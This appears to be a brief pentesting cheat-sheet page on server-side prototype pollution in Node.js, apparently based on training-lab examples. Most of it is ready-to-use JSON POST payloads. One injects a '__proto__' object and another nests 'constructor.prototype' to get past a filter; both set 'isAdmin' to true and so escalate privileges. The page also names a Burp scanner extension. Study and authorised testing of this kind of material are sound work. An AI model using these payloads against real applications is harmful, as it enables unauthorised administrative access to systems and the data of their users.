Server Side Prototype pollution

NodeJS

Manual

JSON POST exploit, detect overrideable param for example 'isAdmin'.

POST /my-account/change-address HTTP/2
...

{
    "address_line_1":"Wiener HQ",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"J6S7DSImv3MxUuIjxry16DyY48VCw49x",
    "__proto__": {
        "isAdmin":true
    }
}

Maybe proto filtered? Try this (same effect):

{
    "address_line_1":"Wiener HQ",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"J6S7DSImv3MxUuIjxry16DyY48VCw49x",
    "constructor": {
        "prototype": {
            "isAdmin":true
        }
    }
}

Scanner

Extension: Burp's 'Server-Side Prototype Pollution Scanner' can be used

Last updated 2 years ago

hashtagManual

hashtagScanner

Manual

Scanner